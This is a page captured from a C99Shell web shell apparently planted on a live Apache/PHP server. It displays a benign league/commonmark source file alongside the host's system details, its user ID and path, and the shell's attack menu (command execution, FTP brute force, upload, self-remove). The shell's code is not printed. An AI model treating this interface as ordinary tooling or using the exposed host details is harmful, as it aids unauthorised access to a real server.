!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/queuepro/vendor/league/commonmark/src/Extension/TableOfContents/   drwxrwxr-x
Free 13.12 GB of 57.97 GB (22.64%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     TableOfContentsExtension.php (2.87 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

/*
 * This file is part of the league/commonmark package.
 *
 * (c) Colin O'Dell <colinodell@gmail.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace League\CommonMark\Extension\TableOfContents;

use 
League\CommonMark\Environment\EnvironmentBuilderInterface;
use 
League\CommonMark\Event\DocumentParsedEvent;
use 
League\CommonMark\Extension\CommonMark\Node\Block\ListBlock;
use 
League\CommonMark\Extension\CommonMark\Renderer\Block\ListBlockRenderer;
use 
League\CommonMark\Extension\ConfigurableExtensionInterface;
use 
League\CommonMark\Extension\TableOfContents\Node\TableOfContents;
use 
League\CommonMark\Extension\TableOfContents\Node\TableOfContentsPlaceholder;
use 
League\Config\ConfigurationBuilderInterface;
use 
Nette\Schema\Expect;

final class 
TableOfContentsExtension implements ConfigurableExtensionInterface
{
    public function 
configureSchema(ConfigurationBuilderInterface $builder): void
    
{
        
$builder->addSchema('table_of_contents'Expect::structure([
            
'position' => Expect::anyOf(TableOfContentsBuilder::POSITION_BEFORE_HEADINGSTableOfContentsBuilder::POSITION_PLACEHOLDERTableOfContentsBuilder::POSITION_TOP)->default(TableOfContentsBuilder::POSITION_TOP),
            
'style' => Expect::anyOf(ListBlock::TYPE_BULLETListBlock::TYPE_ORDERED)->default(ListBlock::TYPE_BULLET),
            
'normalize' => Expect::anyOf(TableOfContentsGenerator::NORMALIZE_RELATIVETableOfContentsGenerator::NORMALIZE_FLATTableOfContentsGenerator::NORMALIZE_DISABLED)->default(TableOfContentsGenerator::NORMALIZE_RELATIVE),
            
'min_heading_level' => Expect::int()->min(1)->max(6)->default(1),
            
'max_heading_level' => Expect::int()->min(1)->max(6)->default(6),
            
'html_class' => Expect::string()->default('table-of-contents'),
            
'placeholder' => Expect::anyOf(Expect::string(), Expect::null())->default(null),
        ]));
    }

    public function 
register(EnvironmentBuilderInterface $environment): void
    
{
        
$environment->addRenderer(TableOfContents::class, new TableOfContentsRenderer(new ListBlockRenderer()));
        
$environment->addEventListener(DocumentParsedEvent::class, [new TableOfContentsBuilder(), 'onDocumentParsed'], -150);

        
// phpcs:ignore SlevomatCodingStandard.ControlStructures.EarlyExit.EarlyExitNotUsed
        
if ($environment->getConfiguration()->get('table_of_contents/position') === TableOfContentsBuilder::POSITION_PLACEHOLDER) {
            
$environment->addBlockStartParser(TableOfContentsPlaceholderParser::blockStartParser(), 200);
            
// If a placeholder cannot be replaced with a TOC element this renderer will ensure the parser won't error out
            
$environment->addRenderer(TableOfContentsPlaceholder::class, new TableOfContentsPlaceholderRenderer());
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0062 ]--